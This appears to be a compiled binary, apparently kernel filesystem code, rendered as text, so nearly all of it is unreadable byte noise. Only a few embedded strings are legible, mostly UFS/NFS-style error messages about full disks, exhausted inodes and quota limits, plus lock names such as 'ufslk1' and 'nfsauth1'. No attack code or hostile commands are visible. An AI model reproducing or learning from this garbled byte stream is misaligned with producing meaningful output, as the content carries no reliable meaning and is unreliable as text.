ðèÀãýÿfƒx
hî
ðè àýÿ‰}àöG:t ƒ}
9±Œ
Sè
öÿÿë
‹ƒ"

‹C@fÿH‰s@‹F
‰C<fÿFƒ~

ÿ
ìÕðëƒøu
ÿ
ðÕðë
ƒø
uÿ
ôÕðÿ
øÕð¡
‹A
·
ñ
ë¿
h(c)ðè`Ðýÿ‹]ø‰{‰{ÇC
¸
jÿuüèYýÿ‹MìMðƒ}
¸@
"K
†à%ÿÿ
†à%ÿÿ
†à%ÿÿ
ÇEà
†à·Ð·A)Â‹F†àÁÈ†àÐ†àÁÈ†à‰F‹F†àÁÈ†àÐ†àÁÈ†àé[
†à%ÿÿ
·APS‰ÈƒÀPèýÖ
‹E
ë
‹}€OÿG 1Àeä[^_ÉÃ

ƒ=pÕð

Ç†€





¸


Ç‡€
ƒ}ü





ƒ}
t\ëzƒ¿"



¡ Òð9CXv*‹Mü€yu!€y
¡ Òð9CXt;¡ Òð‰CX‹FÿF9ÔÕð~‹EƒÀPÿuè(r)ýÿÿë€K8‹¨ÕðSXÇF
ÇÄÕð




Öðj
"îGðë‹B0€xt"Hð...Ût&...öt-Sÿ5
ÇG
Ç"Dð
‰È%
R4...Òuïë&¸


¸
‹C9F<u
ÇEà
‹F‰Gë3ƒz
‹CfÿHfÿF‰s‹Fh‰...Àt‹Fh‰X‰^h~h‰{...Ûu1/4ër‹MäÇA

ÇG$
‹CfÿHfÿG‰{‹Gh‰...Àt‹Gh‰X‰_hOh‰K...Ûu1/4ƒ>
9J(t9J u¸
R...ÒuÕ1À‹]üÉÃ
töBu
ÇEô
¸
¸/
¡hÕð‹@<ëƒÿu‹hÕð‹B
ö@t‹BL‰G‹Mƒy
hÕð...ÛtF‹G†àÁÈ†à%
¸0

¡ Òð9BXwEfƒz6
h×lðè(ýÿj

¡(Øð£ Øð¡ Òð£0Øðÿ5 Øðh¶mðj
èÑ€ýÿÇEð
t)Šó<v Šñ<vŠï<v
ÿ
fø†àf‰C
‹V
ƒÂìFƒÄ
9Âs
h+pðèµ|ýÿƒF
ì‹FƒÀ‰F‰F‹M‹A‰F‹^
jSÿuüèa"
†àf‰C
‹C†àÁÈ†à%
‹Mø‹A
ë‹}ø‹G£XØðÿvhTØðèpUÿÿ‰ÂƒÄ...Ò"Ï
¸
hyðè0uýÿ1Ò‰È- ÖðiÀÅNìÄÁøˆ‚|aðBúÿ
ÇÜ^ð
ƒÄf...Àt
ÿtÕðé
€{	."-

u‹C
9Bu‹C9BuŠC	8B	t
‹úãðuÔ1Òf){€cþöC
 t€Kf‹CfÁàf‰CöCuf...Àt)ÿˆÕðRSèt
‰‰
‹A
‰G‹A‰G‰ûéÆ

‹EèHé7
jè=þÿÃ...Ûu
1Àën‹5¨Øðµ
ÿ˜Õðë(ÿ"Õðƒ}ü
¸
‹B
fƒx.t
¸-


‹uÿ6ÿuÌÿuÜÿuà‹Mà‹AdÿÐ‰EÐƒÄé

‹uÜ‹MÀ‰1ƒÆ‰uÀÿ¸ÕðƒÄ‹MèMÔ‹uä·F9EÔŒZþÿÿ‹]Ø]Ä‹Mä·A‰Þ)Æ‰ðPÿuèþÿ‹M‰Yf‹A†à‹uäf‰Ff‹F€Ì †àf‰FfÇF

ƒÄ‹MMÜ...ÉtO‹uÜ‹v‰u‹MÜÇA
þÿƒÄ‹uuÜ...öu³ƒ}Ð
þÿƒÄëœe´[^_ÉÃU‰åƒì
WVS‹E
‹H
‰Mü‹u‹v
‰uø‹@ƒÀü‰Eô·FEô=ÿÿ
Æ

ÇEü*
j
j
ÿ1èlþÿƒÄ‹UÇ
3/4
‹@‹Mä9tC9Ó|è·G9Ã}
ÇEè0
ÇEè1
‹DŸ‰DŸC·G9Ã|ïfÿO‹Mà‰

j
"'
‹B<‰ë¿Ç

j
)þÿƒÄƒ|
öAtƒA‹Q
ÆB
j
"
"9
‰Ç{+~...ÿ~S¿F
9Ç|8ÿ"üð¿F
˜üðÿuè4õýÿƒÄé¢
Rÿsè úýÿƒÄë|Wÿuèúýÿf)~
~ƒÄ‹ÿ¤üð¿F
¨üð‹M‰N9]tI¿F
FÂ+S...Ò~9¿C
9Â| ‹‹S‹J‰M‹B‹
‰A‹‹J‰ÇB
‹MAHŠ^!ƒã‹‹F‰B‹V‹‰ÇF
f‹W
†òf‰W
Pÿuè2
ƒ}Ð†
†òÁÊ†ò‹EØ9u+öG!u%€Mì‹P†òÁÊ†ò‰Uð‹@†àÁÈ†à‰EôÇEØ


‹UÈöBtt‰ÐƒÀTPRèpþÿƒÄ‹EÈƒxT
‹UÈ‹B<+B8‰E¬‹Z4+Z09Ã~‹]¬9Ù[ÿØüð¿G
FHÿ€üð¿
‰}°="üðÿu‹]ÈƒÃ0SèPþÿSÿuÈèïþÿƒÄ‹UÈƒz|




9NDs-‰Ë+^D‰Ø÷ØPÿuèúîýÿf‹FDf‰G
ƒeÌþÿ¬üð°üðƒÄGHF4WVLEÌ¨...*
u
3/4"
˜üðÿÐüðé&	
9Ë
u%‹UÌöÂuƒeÌþ€N-¿_
ÿ"üð˜üðëÿœüð üðSÿuèƒíýÿ_f)_
·G&ƒÄ9Ø~	f)_&ë
ƒeÌßfÇG&

‰Ã_‹FHFD)Ã...ÛŽ
9Ë|a
°üð‹UÌöÂt/fƒ~
u(G+FH...À~-‹FH
ƒeÌöƒÄöEìt!‹G+†ˆ
‹UÈfÇB$6
æ





...Û"m
"


9Âw+‹UÈöBu"ÿuWRè¤

VHŠG!ƒà‰EÌÿ€üð¿
‰}°="üðÿu‹]ÈƒÃ0Sèö
þÿSÿuÈè•
þÿƒÄ‹UÈƒz|

jj
GPÿuWVèî
...
¡PÙðÉÃƒxP
‹u·N‰N\ÇE¤

‰EÀÇE¤

†àÁÈ†à‰ƒÂ¡¸(r)ð†àÁÈ†à‰‹M‹€

‹ufƒ~

‹E¬EÀPÿu´èóë
‹uÿF,€N-‹UÀ‹MQ,‰Q,‹A,‹u+FX...À~‰VXfƒ~f

fƒy



Çôáð(
‹C‰B
‹C‰Bf‹C f‰Bf‹Cf‰BÇB

ƒEü(‹}ü‹M‰y‰yÇA
‹B‰A‹J‹‰ÇB

uj

t¿Cd9üÓð|f¡dÙðf‰Céà
fƒ{~ÿs$è"Žÿÿf‹ClfÁøfCnfÇCl
3/4/
3/4#
uƒ¸"
ÇEø
j
f¡üÓðf‰C‰Ø‹]üÉÃU‰åVS‹E‹u‹]‹M‹Uƒ}
t
¸
Þüÿë¸*
CPÿuè/Ô
"8
"9
‹G‰C
‹G‰Cf‹G f‰Cf‹Gf‰Cf‹C
f‰CfÇC

¿8
¿9
¸


1ÀéÀ	
¸

ë\ƒútëUÿuÿu
ÿuèÎ‹

þÿƒÄë	Sè
þÿƒÄÿ...lÿÿÿ1/2lÿÿÿu93/4€
u)9- 
hððè@÷üÿÇEÌ*ð1/2lÿÿÿ‰}‹WX¡Ì·ð‹JUŒR‹ÿÒƒÄƒø...Žþÿÿ¸



ƒút@ë+ƒúu#1Ûë21/2lÿÿÿ‹WL‰ÑÁù‹u
‰V‰N
ë‹}ÿw8hððèÄöüÿƒÄÿµlÿÿÿè'þÿƒÄ1/2pÿÿÿ
¸
þÿƒÄ...ÀuLÿuj


u9- 

hlðèZ(r)üÿÇlð
hlðèT­üÿÇlð
‹S
‹C‰BVèQþÿjÿvdè§qüÿÇFd
j
ÿrèqüÿ1ÀÉÃ

ƒ8...
‰{8‰_@ëÓ...Û"Ú
u1öƒ?
...lÿÿÿ1/2hÿÿÿ
f
ëN9
‹A£eðë	‹Q
‹A‰B‰Y‹eðúeðt9Z~
‹R
úeðuðúeðu4¡eð‰AÇA
eð=eðeðu	‰
eðë	¡eð‰H
‰
eðë%‹B‰A‰Q
zeðu
‰
eðë‹B‰H
‰J‹]üÉÃ

t
‹uð‹vƒÆ(‰uÔEüPj jj
öAtƒA‹Q
‹AƒÀü


‹V‹F
‰B
~
eðu
‹F£eðë	‹V
‹F‰Bƒ>

ÇCÿÿÿÿë
‹VD†òÁÊ†ò‰S‹V†òÁÊ†ò‰S$‹V†òÁÊ†ò‰S(‹V†òÁÊ†ò‰Sj
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊ†ò‰ST‹VP†òÁÊ†ò‰SX‰ø¥8ÿÿÿ[^_ÉÃ

S...Ûu÷E´PE¸PRWj
öCtƒC‹S
‹CƒÀü
‹EƒE ë3...ÄýÿÿPRj EPEPè•ý

hÖ-ðèÐ3/4üÿ‹E 9Cu
‹S
‰-Œ
‹K‹S
‰Q
‹E 9C
u
‹S‰-ˆ
hÝ-ðèÀ1/2üÿ‹E¤9Fu-ÿuÿu
jVèöõÿÿÄ...Àu‹"Ä
öG@"#þÿÿ÷

‹H
‹P‰Qƒþuë
ƒþu
ƒ`0¿ë€H0@ƒ}
‹uƒE ë!EÜPRj EPEPèðõ

‹UƒE ë;•|ÿÿÿRQj URURè)ô
1Àé
‹•dÿÿÿƒÂD‰•dÿÿÿ‹‹•PÚð†òÁÊ†ò‰ƒ>
u
·V
0Ìðë‹
·V
 Ìð†òÁÊ†ò‰S¿V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S
‹V
òÁÊòSxÿ...+
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<òÁÊòSPVTòÁÊòSTVPòÁÊòSX...Hÿÿÿ¥8ÿÿÿ[^_ÉÃ

DòÁÊòS ...@ÿÿÿ‹P†òÁÊ†ò‰S,‹P†òÁÊ†ò‰S0‹P†òÁÊ†ò‰S‹P†òÁÊ†ò‰S‹PL†òÁÊ†ò‰S$‹PH†òÁÊ†ò‰S(‹P$†òÁÊ†ò‰S4‹P(†òÁÊ†ò‰S8‹P,†òÁÊ†ò‰S<‹P0†òÁÊ†ò‰S@‹P4†òÁÊ†ò‰SD‹P8†òÁÊ†ò‰SH‹P@†òÁÊ†ò‰SL‹P<†òÁÊ†ò‰SP‹PT†òÁÊ†ò‰ST‹PP†òÁÊ†ò‰SX‹Eƒxxÿ"L
‹]ƒE ë'•4ÿÿÿRQj URURèqâ

ÇCÿÿÿÿë
‹VD†òÁÊ†ò‰S‹V†òÁÊ†ò‰S$‹V†òÁÊ†ò‰S(‹V†òÁÊ†ò‰Sj
ÇC ÿÿÿÿë
‹VD†òÁÊ†ò‰S ‹V†òÁÊ†ò‰S,‹V†òÁÊ†ò‰S0‹V†òÁÊ†ò‰S‹V†òÁÊ†ò‰S‹VL†òÁÊ†ò‰S$‹VH†òÁÊ†ò‰S(‹V$†òÁÊ†ò‰S4‹V(†òÁÊ†ò‰S8‹V,†òÁÊ†ò‰S<‹V0†òÁÊ†ò‰S@‹V4†òÁÊ†ò‰SD‹V8†òÁÊ†ò‰SH‹V@†òÁÊ†ò‰SL‹V<†òÁÊ†ò‰SP‹VT†òÁÊ†ò‰ST‹VP†òÁÊ†ò‰SX‰ø¥èþÿÿ[^_ÉÃ
ë,•\ÿÿÿRQjURURè}Ï

‰ÃƒÄ‹
·B
 Ìð‰Á†éÁÉ†é‰O‹•øþÿÿ¿R†òÁÊ†ò‰W...øþÿÿ‹@†àÁÈ†à‰G
‹•øþÿÿ‹R
†òÁÊ†ò‰WƒÄ‹Exxÿ...§
ÇG ÿÿÿÿëøþÿÿRDòÁÊòW ...øþÿÿ‹@†àÁÈ†à‰G,‹•øþÿÿ‹RòÁÊòW0...øþÿÿ‹@†àÁÈ†à‰GøþÿÿRòÁÊòW...øþÿÿ@LàÁÈàG$øþÿÿRHòÁÊòW(...øþÿÿ@$àÁÈàG4øþÿÿR(òÁÊòW8...øþÿÿ@,àÁÈàG<øþÿÿR0òÁÊòW@...øþÿÿ‹@4†àÁÈ†à‰GD‹•øþÿÿ‹R8†òÁÊ†ò‰WH‹...øþÿÿ@@àÁÈàGLøþÿÿR<òÁÊòWP...øþÿÿ@TàÁÈàGTøþÿÿRPòÁÊòWX...üþÿÿ@)...
ÿÿÿ‹
ÿÿÿƒÁ€áü9ÿÿÿu9
ÿÿÿt‰Ê+•
ÿÿÿR‹•ÿÿÿ)ÊRÿµHÿÿÿè	Ð
Ç...þÿÿ
‹]ƒE ë'•LþÿÿRQj URURèU¿
ƒx

ƒù+
ë'ƒù~‹]‹Eƒxxÿt
‰ÚƒÂ,ë‹UƒÂ ‰UëK•4ÿÿÿRQº 
'ÿÿ‹•lÿÿÿÄ Ç...
ÿÿÿ4±ðÿÿÿ...hÿÿÿ...ÿÿÿ...|ÿÿÿ...ÿÿÿ...ÿÿÿ...ÿÿÿ¡4±ð‹J•
ÿÿÿR‹ÿÒ...

ƒxÿ"±
ÇC0ÿÿÿÿ...ÿÿÿ‹P,†òÁÊ†ò‰S4ƒx0ÿt ‹H0ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S8ë
ÇC8ÿÿÿÿ...ÿÿÿ‹P4†òÁÊ†ò‰S<ƒx8ÿt$‹H8ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S@é¯
‹EƒEë0E"PRjEPEPè¬ž
ýÿƒÄ...Û...œ
"
Ç...hÿÿÿ
"
"
Ç...Üþÿÿ
Ç...àþÿÿ
"
ƒú+
ë'ƒú~‹E‹Mƒyxÿt
‰ÂƒÂ,ë‹UƒÂ ‰UëK...ÿÿÿPR¸ 
Ç...Èþÿÿ
‹UƒE ë+•4ÿÿÿRQj URURè5Š
ÿÿÿ‹•(ÿÿÿÇB
ÇC0ÿÿÿÿ...üþÿÿ‹P,†òÁÊ†ò‰S4ƒx0ÿt ‹H0ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S8ë
ÇC8ÿÿÿÿ...üþÿÿ‹P4†òÁÊ†ò‰S<ƒx8ÿt$‹H8ºÓMb‰È÷êÁúÁù)Ê†òÁÊ†ò‰S@é
‹EƒEë0E"PRjEPEPèä}
"
‹EƒEë4U1/4RPjURURèôz
Ç... ÿÿÿ
‹`ÿÿÿƒ;
ºd
ÿ
œÈð‹V‹‰Øfð‰=
ÿ
œÈð‹V‹‰Øfð‰=
‹ˆ|ðë‹Tið‰ƒÇ9u¨t91/2dÿÿÿv+~
‰~ë‰ú+U¤VjJÿµLÿÿÿèÓ"ûÿjJÿu"èÉ"ûÿ...4ÿÿÿ¥ÿÿÿ[^_ÉÃU‰åìô

°
·B
 Ìð‰Á†éÁÉ†é‰K‹•Dþÿÿ¿R†òÁÊ†ò‰S...Dþÿÿ‹@†àÁÈ†à‰C
‹•Dþÿÿ‹R
†òÁÊ†ò‰SƒÄ‹Exxÿ...ƒ
ÇC ÿÿÿÿë...Dþÿÿ@DàÁÈàC DþÿÿRòÁÊòS,...Dþÿÿ‹@†àÁÈ†à‰C0‹•Dþÿÿ‹R†òÁÊ†ò‰S...Dþÿÿ@àÁÈàCDþÿÿRLòÁÊòS$...Dþÿÿ‹@H†àÁÈ†à‰C(‹•Dþÿÿ‹R$†òÁÊ†òS4...Dþÿÿ@(àÁÈàC8DþÿÿR,òÁÊòS<...Dþÿÿ@0àÁÈàC@DþÿÿR4òÁÊòSD...Dþÿÿ@8àÁÈàCHDþÿÿR@òÁÊòSL...Dþÿÿ@<àÁÈàCPDþÿÿRTòÁÊòST...Dþÿÿ@PàÁÈàCX8þÿÿ...<þÿÿT...@þÿÿD|...@þÿÿ,þÿÿ9ÐKúÿÿ91/2dþÿÿ‡_

ÿ
œÈð‹V‹‰Øfð‰
ÿ
œÈð‹V‹‰Øfð‰
‹M‰A8€{...å
‰ð†à‹Møë×SèZ·üÿƒÄ...ÿ..."
‹Mü€aûë(‹MüöAt
fƒy$
"

j

j


¨uöBt
1Éë‹M
fƒ:"À%ÿ




öF$...Ùþÿÿû#tÆ...Û...¤
öF$...qýÿÿû#t²...Ûu
‹Mƒ9
(r)üÿ‹MÇ
‰ÊƒEðë"UìRPjUðRUôRèü7
‹R9\žðtCöFt%ÿuðÿuôÿuøVè9ÿÿÄ...À"
‹S8‰Pë	Ç@@B
ÇG$
‹‹W‰Që	‹W‰Èjð‹O‹‰£
ÇEÈ
‹MäƒEäë"UàRQjUäRUèRèÐ.
Àt
€K$éý
‹G
j
¸

ð‰ð
PSèï­ûÿƒÄþ
öA
"U
‹F‰F
ëN‰N
ÇF
ƒ}"ž
t	þ#...bÿÿÿƒ}Ø
ÇB
‰ÂƒEØ(ë&EÔPRj(EØPEÜPè,
‹UØƒEØë%EÔPRjEØPEÜPè¸

‹‹C‰Bë‹C£Pìð‹S‹‰Ç
ÿÈÏð1öëköCt*ÿÐÏðEøPEüPWj
€cýSèÑ£ûÿ‰ðét
‹‹C‰Bë‹C£Pìð‹S‹‰öCt
ÿsèSˆüÿƒÄöC@"Á
€cýSè[¡ûÿ¸
‹‹A‰Bë‹A£Pìð‹Q‹‰j4Qè±eûÿƒÄÙ...Éu¸ÇÀ"ð
‹<ôÙðë
¿
ÇpÝð
¸
‹u
‹6‰uÐ)N‹Uð)Uƒ}
ƒ}ì
¸
h"*ðèÄÃûÿj
]1/4Ã8]Ð]àM1/4‰Y8f‹]Ü€çf‰Y<‹V†òÁÊ†òf‰Q>‹V
†òÁÊ†ò‰Q@‹V†òÁÊ†ò‰QD‹]Ø‰Y|‹Uì‰Qd‹Uð‰Qh‹Mè‹QR<]1/4‰SHƒ}ä
‹]ÐÇC(ÿÿÿÿ‹MÐÇA@
"
‹	Aƒ9
¸F
‹u Ç

j

j



t	}ìÇ(}ä~}ð...ÿt
‰}àÇEÜ
ÇœÝð
öCtƒC‹K
‹UÐÊ
‹W‰ØfðÿœÈð£
j
‹‹A‰Bë‹A‰C
‹Q‹‰j3Qè/ûÿƒÄñ...Éuºeô[^_ÉÃnfsauth1
‹‹A‰Bë‹A£8éð‹Q‹‰j2Qè}-ûÿÉÃ
h¶>ðèäœûÿ€
´_ðƒ}
‹‹C‰Bë‹C£8éð‹S‹‰j2Sè-ûÿƒÄó...ÛuÀèÇÿÿÇ4éð
ƒú
ëƒú~‹Uìƒ}à


Ç Òð

¸
öC0 "$
¸
Çƒ˜
ƒc0÷‹‹¬
ƒÿ"ö
1Àé
ƒÂ,‰Pë
ƒÂ ‹uÀ‰Vƒ}Ü
‹MðƒEðë!UèRQjUðRUôRèL¹ÿÿ‰ÃƒÄ...ÛuF‹Mè‹†òÁÊ†ò‰Uä‹I†éÁÉ†é‰Mà‹EÐ9À
u91/4



öA0"jÿÿÿ‹•hÿÿÿÇ‚°
f1/2Xÿÿÿ
Ç...4ÿÿÿ-
f1/2Xÿÿÿ
‹EðƒEðë!EìPRjEðPEôPèðªÿÿ‰ÃƒÄ...ÛuA‹Eì‹
(tm)ÿÿ‰Ç‰}ÌƒÄöGt‹WW$‹O
O)Êƒú~ é·
‹MìƒEìë$UäRQjÿuÈÿuÄèŽ¢ÿÿ‰EÀƒÄ...À...Püÿÿ‹Mä‹†òÁÊ†ò‰Uà‹I†éÁÉ†é‰MÜ‹]Ô9"À
u91/4
/
ÇAÿÿÿÿG,àÁÈàA0ÿt201/2@ÿÿÿ¸ÓMb÷ï‰ÓÁû‰Dÿÿÿ‰øÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...lÿÿÿPpÿÿÿR...tÿÿÿP‹•Xÿÿÿÿr
ÿrj	ÿµLÿÿÿÿµ\ÿÿÿèeÿÿÃÄ ...Û...ì
ø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...\ÿÿÿ@,àÁÈàA\ÿÿÿz0ÿt:B0...Lÿÿÿ¸ÓMb÷­Lÿÿÿ‰ÓÁûPÿÿÿ...LÿÿÿÁø‰Ú)Â†òÁÊòQë	ÇAÿÿÿÿ...pÿÿÿP...tÿÿÿP...xÿÿÿPÿw
ÿwj	ÿµTÿÿÿÿµ`ÿÿÿè÷\ÿÿÃÄ ...Û...ò
¸
ÿµpÿÿÿè%ÿÿ...hÿÿÿ‰E"ƒÄö@t‹hÿÿÿ‹AA$‹Q
Q)Ðƒø~$é°
ÿµhÿÿÿÿµpÿÿÿèÁWÿÿÃÄ ...Ûu
ÿu€èTüÿƒÄj
ÿwèÇáúÿ‹pÿÿÿ‹Ad€H0‹AdÇ€˜
ÿqè1/4{ÿÿ‰Ç‰}øƒÄöGt‹GG$‹W
W)Ðƒø~%é±
WÿqèfTÿÿÃÄ ...Ûuÿuôèùýûÿ‹M‹A‹@d€H0‹A‹@dÇ€˜
Qè<§üÿë
ÿuÜèü¦üÿƒÄƒ}ä
ðh€

C
òQ...Tÿÿÿƒx(ÿt6‹P(‰•,ÿÿÿ¸ÓMb÷ê‰ÓÁû<ÿÿÿ...,ÿÿÿÁø‰Ú)Â†òÁÊ†ò‰Që	ÇAÿÿÿÿ...Tÿÿÿ@,àÁÈàATÿÿÿz0ÿt:B0...8ÿÿÿ¸ÓMb÷­8ÿÿÿ‰ÓÁû<ÿÿÿ...8ÿÿÿÁøÚ)ÂòÁÊòQë	ÇAÿÿÿÿ...pÿÿÿPtÿÿÿR...xÿÿÿP‹•Pÿÿÿÿr
ÿrj
WÿµXÿÿÿèÎ4ÿÿÃÄ ...Û...Ì
t‹PP$‹H
H‰Èë‹Eø‹H
H‰ÈƒÀ€‹Uø)Â9ÖŽ¢
ƒ~

¿H
Ç...lÿÿÿ
Ç...lÿÿÿ
Ç...hÿÿÿ
Ç...Tÿÿÿ
ð...EàtèQØ
¸

%s: write failed, file system is full





hZéðè8ûÿ‹]+]‰ÚÁê	-è


%s: create/symlink failed, no inodes free

¡ Òð£xÒð¡xÒð‰ƒì
‹Mƒ|ü
‰ðF`Eè¶
‰ðF`Eè¶
‰ðF`ø‰Ç‹UôÚ‰Uè‹EèyƒÀ
$ø‹Mè)Á‰ÈºþÿÿÿÓÂ‰Ð 
ÿN$‹Møÿ‰Ì
‰ðF`Eà‰Eì‹MÙ‰Mà‹EàyƒÀ
$ø‹Uà)Â‰Ðº
‰ðF`Eà‰Eè‹UøÚ‰Uà‹EàyƒÀ
$ø‹Mà)Á‰ÈºþÿÿÿÓÂ‰Ð‹Mè C9]ô¤‹Uô)V$)-Ì

‰ÁÁØ
‹Eü‹U
‰B(‹N`‹]üÓûS‹U
zU	
‰ÑÁØ
Të‹]
[TËÿ
Æ†Ð
h£ðè´êúÿw89uØÿuüèìûûÿ‹Eôë
ÿuüèÜûûÿ1ÀeÜ[^_ÉÃcg = %d, irotor = %ld, fs = %s


"
Ô
‰ØC\È3/4
èúÿs0ð...ö}F
‰ÁÁù{U	
"
Ô



‰ÚS`‰UÜÿuÜWè;&

´3Ø

uð...ö}ƒÆ
Áþ‰uÜ{U	



"Ø
ÿ‰}äë¶
‰MìCÇEä

fÜþÿÿée
¸
Ç...(ÿÿÿ
Ç...(ÿÿÿ
Ç‡è
Eà(tm)÷}Ü‰Eà‹Uð‹R0Áê	‰UØj


¸
¸
jÿuÀè‹
Ç€P

ƒ{0
hlðèvúÿÇlð
¡ Òð£xÒð‹=xÒð‹EÐ‰¸ì
¸F
‹MìI
‹}ìgÿûÿÿƒ}Ô
ëtƒútëm‹uÀ÷Æ
ƒ{L
hÃOðèžúÿ9{Xu	‹uƒ~
tZSèø(c)ûÿ‹S$€Ê‰S$ƒÄ‹uØ‰5
Í
|Êé
}*‹F@‹L¸ü‹UÈJ(9
¸uG‹Uÿ‹MÈ9y v
‹M¸9
|ÙƒEÀ
ÿMØ...Èþÿÿ...ötVè
"ûÿUÈB$ÁÓe1/4M1/4‹U‰
...ÉuÇÿÿÿÿ1Àe [^_ÉÃ

Ç€´


Ç´
ƒÂ9Ârö·ÁÉÃ

ÇA4ÿÿÿÿ€IÉÃ
fƒøt
ë"fƒøtë¸-

u+9-ˆ
ƒ}"...+
uq9-ˆ
¸



u%9-ˆ
hgrðèôwúÿfµpþÿÿfµüþÿÿ1/2lþÿÿf‰_ß1/2lþÿÿÿµtþÿÿÿµlþÿÿ•øþÿÿRè
uj9-ˆ

%s: write failed, %s disk limit reached

%s: warning, %s %s

%s: write failed, %s %s

%s: write failed, %s inode limit reached

üÿ‰E¨ƒÄ
...À...›
ÌûÿƒÄéõ
‹@8‹U‰D-,‹E¬ƒx<
‹@<‹U‰D-4ÿu¬j
1ÀéÈ
‹M
aÿßÿÿ‰Øeì[^_ÉÃ
PVèP
‹}öD7<t‹uÇ
‹S
‰Q
ë
‹S
‰1/4ìð‹S
‰
fÿC‹}‰é
Ç1/4ìð€ið‰
€iðÇC
‹u°9ut-ÇEØlµð‰uÜ¡lµð‹NUØR‹ÿÒƒÄ}´...Ét‰Y‰
‹u´‰s‰-fÿCfÇC
Ç
ƒ{ 
1Àé\
Vè=)úÿƒÄöFu(9]t'ÇEØ˜µð‰]Ü¡˜µð‹KUØR‹ÿÒéqÿÿÿöFu¶€N}Ð‰}àÇEä
Ç

ƒøu	¸
‰˜
ÇC 
ÇC 
‹V‹R$‰S ‹è
ƒ~ÿ"€
ƒùtë$ƒùtë¸
ƒ~,ÿ"

¸-
¸O
Wèøµûÿë
ÿuüè¸µûÿƒÄWè¯µûÿ‰ðeð[^_ÉÃ
h(ðèÜQúÿ1/2|ÿÿÿÇ

èQ(c)ûÿƒÄÿvèF(c)ûÿƒÄ‹UØÇEÜlµð‰Uà¡lµð‹JUÜR‹ÿÒƒÄ...Àu"1/2xÿÿÿfÿ‚
¥ûÿ‰ðeÈ[^_ÉÃU‰åƒìWVS‹]‹{ÿs
Wÿs‹Sf‹R€Î ·ÒRè+

j
ÿrè(r)Ñùÿ1ÀÉÃufslk1

ÇBT

úÿ1ÀÉÃ


°ðè@@úÿ1Àeø[^ÉÃ
‹K‰Mü‹SQ<‰Uø‹w¶O	IÁà)È‹...´ðð...Àt
=Ðÿðt
=

h[¸ðèœ5úÿjÿuøVÿÐPèNB
‹‹A‰Bë‹A£Ôzð‹Q‹‰fÇA&fÇA2
Ç@
Ç@
ÿKÿCë6ƒ{


äð1ÀëJ=
äðÿ
hç3/4ðè.úÿÇ`žð
Ç`žð
hç3/4ðèw-úÿÇ`žð
Ç`žð
9DžuƒÂÇDžÿÿÿÿë$D
ÿPQÿuèêýÿÿ‹Lžº
ÿPQÿuè­ýÿÿƒÄ
‹Eü£

Ç@íð

‹‹F‰Bë‹F£lžð‹V‹‰€cýë9ƒ>
è1/2

èá

ÇEì


Ç@íð
èMîÿÿé[ÿÿÿ‹UÇ²
‹(tm)‰EfÿHC9]Þ1Û9]~‹Uƒ<š
è
‹Eð‹˜‰E€fÿHC9]³‹w
hÐ
ÇEè
‹‹C‰Bë‹C£D¯ð‹S‹‰ë'‰5




ƒ}Ì
ÇEŒ
ƒ}Œ...Ö
hãðèHúÿ‰uœ9]Ø"È
Vèo
VWÿuè5
þÿÿƒÄ...Àtƒ}ô
ë-‹Mà‹U ‰
‰ðë‹U Ç
hµûðèøðùÿ1öjj‰óÁã
‰ØEüP‹Møÿ1èãà
hà(tm)ðè´·ùÿeø[^ÉÃ



Ç0Uð
h"
ðèÜßùÿ‰Øeô[^_ÉÃ
¸
‹A‰B‹‰P‹B‰ƒÄöAt
ÿrè-ûÿÿë
ÿrè%
¸
SVèÄÿÿÿƒÄÿND‹S‹‰‹‹C‰B‹C
+C)FHöCt
ÿsè"òÿÿë
ÿsèt


1ÀeÄ[^_ÉÃU‰å‹E
ö@t‹@ƒÀPè`'ÿÿƒÄ‹EƒÀPèQ'ÿÿÉÃ
hà(tm)ðè...ŽùÿÉÃ
yÿ...²
u‹]ð‹s ƒ~8tƒ~8t¸
¸
÷Áÿ
ƒøt	ë1Àë
¸
¸#
...Û"-üÿÿëƒûtƒûu¸


ûÿƒÄ(ÇEø˜µð‰]ü‹˜µð‹CV‹ÿÐë8öC&t
h=;ðèh´ùÿƒÄ€c&ïöC& t
c&ßSè(tm)|ùÿƒÄSèh"
€g0¿Wè=uùÿeô[^_ÉÃcpylck

fƒø...-
fƒø..."

€a0¿Qèiiùÿeô[^_ÉÃ
Çläð
q‰pÇA
‹Q‹A‰B‹Q‹A‰‹AÿH4€a&¿ÉÃ
‹Q‹A‰B‹Q‹A‰‹AÿH4€a&¿öA&@t
htTðè±-ùÿ‰Y‰y‰øÁè
Ø#ÀfðÁàdžðÇA
q‰pÇA
‹‹A‰Bë‹A£hÒð‹Q‹‰ÿ
ˆäð€a&ýÉÃ¨t,ƒ9
‹‹A‰Bë‹A£"âð‹A‹‰ÿ
"äðfa&ÿ¿¡"äð€äð9täðv*ƒ=ôfð
ƒútº

‹S‹C‰B‹S‹C‰‹CÿH4€c&¿ÿ
"äðé†
htTðèœ"ùÿ‰s‹}
‰{‰øÁè
ð#ÀfðÁàdžðÇC
9Uv...Uèt	F95päðwÐ95päðtv†‹}‹Mð| ‰ø9Es%‹Mü‰

]
htTðèÜùÿ‹}è‰{‰CÁè
ø#ÀfðÁàdžðÇC

‹S‹C‰B‹S‹C‰CÿH4c&¿*C&(c)@
‹‹C‰Bë‹C£"âð‹C‹‰ÿ
